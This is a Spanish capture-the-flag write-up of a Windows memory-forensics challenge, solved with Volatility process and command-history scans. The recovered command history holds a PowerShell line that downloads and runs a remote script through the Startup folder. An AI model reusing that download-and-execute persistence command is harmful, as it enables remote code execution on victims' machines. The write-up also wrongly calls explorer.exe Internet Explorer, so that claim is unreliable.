Export
6 minutos de lectura
Se nos proporciona un volcado de memoria llamado WIN-LQS146OE2S1-20201027-142607.raw:
$ file WIN-LQS146OE2S1-20201027-142607.raw
WIN-LQS146OE2S1-20201027-142607.raw: data
Al leer el nombre, podemos suponer que proviene de una máquina Windows.
Análisis de volcado de memoria
Usaremos volatility para analizarlo (específicamente, esta imagen de Docker):
$ docker run --rm -v "${PWD}":/project --entrypoint /bin/bash -it phocean/volatility
vol@6c13ee800d5a:/volatility$ cd /project
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/project/WIN-LQS146OE2S1-20201027-142607.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80001a540a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80001a55d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2020-10-27 14:26:09 UTC+0000
Image local date and time : 2020-10-27 19:56:09 +0530
Parece que estamos tratando con un Windows 7 (perfil Win7SP1x64). Enumeremos todos los procesos:
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8006cbd040 System 4 0 80 469 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa800765a040 smss.exe 228 4 2 29 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa8007610060 csrss.exe 320 304 9 359 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008012060 wininit.exe 360 304 3 77 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800800e370 csrss.exe 368 352 9 190 1 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800802e4a0 winlogon.exe 404 352 4 103 1 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008029b30 services.exe 460 360 7 199 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008050b30 lsass.exe 476 360 6 547 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008090b30 lsm.exe 484 360 9 142 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80080dd2b0 svchost.exe 588 460 10 349 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80081015f0 svchost.exe 656 460 8 266 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008126b30 svchost.exe 708 460 13 296 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008166b30 svchost.exe 832 460 37 871 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008180b30 svchost.exe 880 460 9 475 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008197b30 svchost.exe 916 460 10 207 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80081c5b30 svchost.exe 964 460 17 489 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800724b410 svchost.exe 328 460 16 289 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa8008276b30 spoolsv.exe 480 460 13 266 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80081ef890 svchost.exe 1056 460 3 46 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082997c0 VGAuthService. 1088 460 3 86 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082c3890 vmtoolsd.exe 1124 460 11 254 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082d4b30 wlms.exe 1152 460 4 44 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa800834c5c0 sppsvc.exe 1336 460 4 149 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80083b8060 WmiPrvSE.exe 1448 588 10 206 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80083f7a30 dllhost.exe 1552 460 13 188 0 0 2020-10-27 14:12:11 UTC+0000
0xfffffa80083d5b30 msdtc.exe 1632 460 12 147 0 0 2020-10-27 14:12:11 UTC+0000
0xfffffa80083ca550 WmiPrvSE.exe 1948 588 9 194 0 0 2020-10-27 14:12:30 UTC+0000
0xfffffa80084beb30 svchost.exe 824 460 5 68 0 0 2020-10-27 14:14:10 UTC+0000
0xfffffa800834a590 taskhost.exe 1440 460 6 120 1 0 2020-10-27 14:22:09 UTC+0000
0xfffffa80080db410 dwm.exe 1412 916 5 69 1 0 2020-10-27 14:22:09 UTC+0000
0xfffffa8008432530 explorer.exe 808 1860 20 521 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa8008081b30 vm3dservice.ex 1008 808 2 35 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa8008531b30 vmtoolsd.exe 1800 808 8 177 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa800766cb30 TrustedInstall 800 460 5 121 0 0 2020-10-27 14:22:15 UTC+0000
0xfffffa80076cd8d0 cmd.exe 1640 808 1 20 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa80084bb6b0 conhost.exe 1780 368 2 39 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa8008591060 DumpIt.exe 2004 808 2 47 1 1 2020-10-27 14:26:07 UTC+0000
0xfffffa8006d20060 conhost.exe 1796 368 2 35 1 0 2020-10-27 14:26:07 UTC+0000
Este resultado es bueno, pero a veces es mejor usar pstree para observar los procesos de padre e hijo visualmente. De lo contrario, tendríamos que mirar los números PID y PPID.
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xfffffa8007610060:csrss.exe 320 304 9 359 2020-10-27 14:12:09 UTC+0000
0xfffffa8008012060:wininit.exe 360 304 3 77 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8008029b30:services.exe 460 360 7 199 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80082d4b30:wlms.exe 1152 460 4 44 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa8008166b30:svchost.exe 832 460 37 871 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80081015f0:svchost.exe 656 460 8 266 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80083f7a30:dllhost.exe 1552 460 13 188 2020-10-27 14:12:11 UTC+0000
.. 0xfffffa8008126b30:svchost.exe 708 460 13 296 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80081ef890:svchost.exe 1056 460 3 46 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa8008180b30:svchost.exe 880 460 9 475 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80082997c0:VGAuthService. 1088 460 3 86 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa800834c5c0:sppsvc.exe 1336 460 4 149 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80083d5b30:msdtc.exe 1632 460 12 147 2020-10-27 14:12:11 UTC+0000
.. 0xfffffa80081c5b30:svchost.exe 964 460 17 489 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa800724b410:svchost.exe 328 460 16 289 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80080dd2b0:svchost.exe 588 460 10 349 2020-10-27 14:12:09 UTC+0000
... 0xfffffa80083ca550:WmiPrvSE.exe 1948 588 9 194 2020-10-27 14:12:30 UTC+0000
... 0xfffffa80083b8060:WmiPrvSE.exe 1448 588 10 206 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80084beb30:svchost.exe 824 460 5 68 2020-10-27 14:14:10 UTC+0000
.. 0xfffffa800766cb30:TrustedInstall 800 460 5 121 2020-10-27 14:22:15 UTC+0000
.. 0xfffffa8008276b30:spoolsv.exe 480 460 13 266 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80082c3890:vmtoolsd.exe 1124 460 11 254 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa800834a590:taskhost.exe 1440 460 6 120 2020-10-27 14:22:09 UTC+0000
.. 0xfffffa8008197b30:svchost.exe 916 460 10 207 2020-10-27 14:12:09 UTC+0000
... 0xfffffa80080db410:dwm.exe 1412 916 5 69 2020-10-27 14:22:09 UTC+0000
. 0xfffffa8008090b30:lsm.exe 484 360 9 142 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8008050b30:lsass.exe 476 360 6 547 2020-10-27 14:12:09 UTC+0000
0xfffffa8006cbd040:System 4 0 80 469 2020-10-27 14:12:08 UTC+0000
. 0xfffffa800765a040:smss.exe 228 4 2 29 2020-10-27 14:12:08 UTC+0000
0xfffffa8008432530:explorer.exe 808 1860 20 521 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008531b30:vmtoolsd.exe 1800 808 8 177 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008081b30:vm3dservice.ex 1008 808 2 35 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008591060:DumpIt.exe 2004 808 2 47 2020-10-27 14:26:07 UTC+0000
. 0xfffffa80076cd8d0:cmd.exe 1640 808 1 20 2020-10-27 14:24:50 UTC+0000
0xfffffa800802e4a0:winlogon.exe 404 352 4 103 2020-10-27 14:12:09 UTC+0000
0xfffffa800800e370:csrss.exe 368 352 9 190 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8006d20060:conhost.exe 1796 368 2 35 2020-10-27 14:26:07 UTC+0000
. 0xfffffa80084bb6b0:conhost.exe 1780 368 2 39 2020-10-27 14:24:50 UTC+0000Como se puede ver, está Internet Explorer (explorer.exe), y como procesos hijos tenemos algunos como DumpIt.exe (que se utiliza para volcar la memoria para el reto), y luego cmd.exe, que es un proceso que destaca claramente.
Análisis de línea de comandos
Dicho eso, usaremos cmdscan para analizar lo que se ha ejecutado desde la línea de comandos:
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: conhost.exe Pid: 1780
CommandHistory: 0x257430 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x23bde0: echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") > C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3usy12fv.ps1
**************************************************
CommandProcess: conhost.exe Pid: 1796
CommandHistory: 0x2c6a90 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Podemos ver que alguien estaba tratando de descargar un payload de PowerShell de esta URL:
http://bit.ly/SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=.ps1
Flag
El nombre del recurso parece codificado en Base64, y de hecho es la flag:
$ echo SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30= | base64 -d
HTB{W1Nd0ws_f0r3Ns1CS_3H?}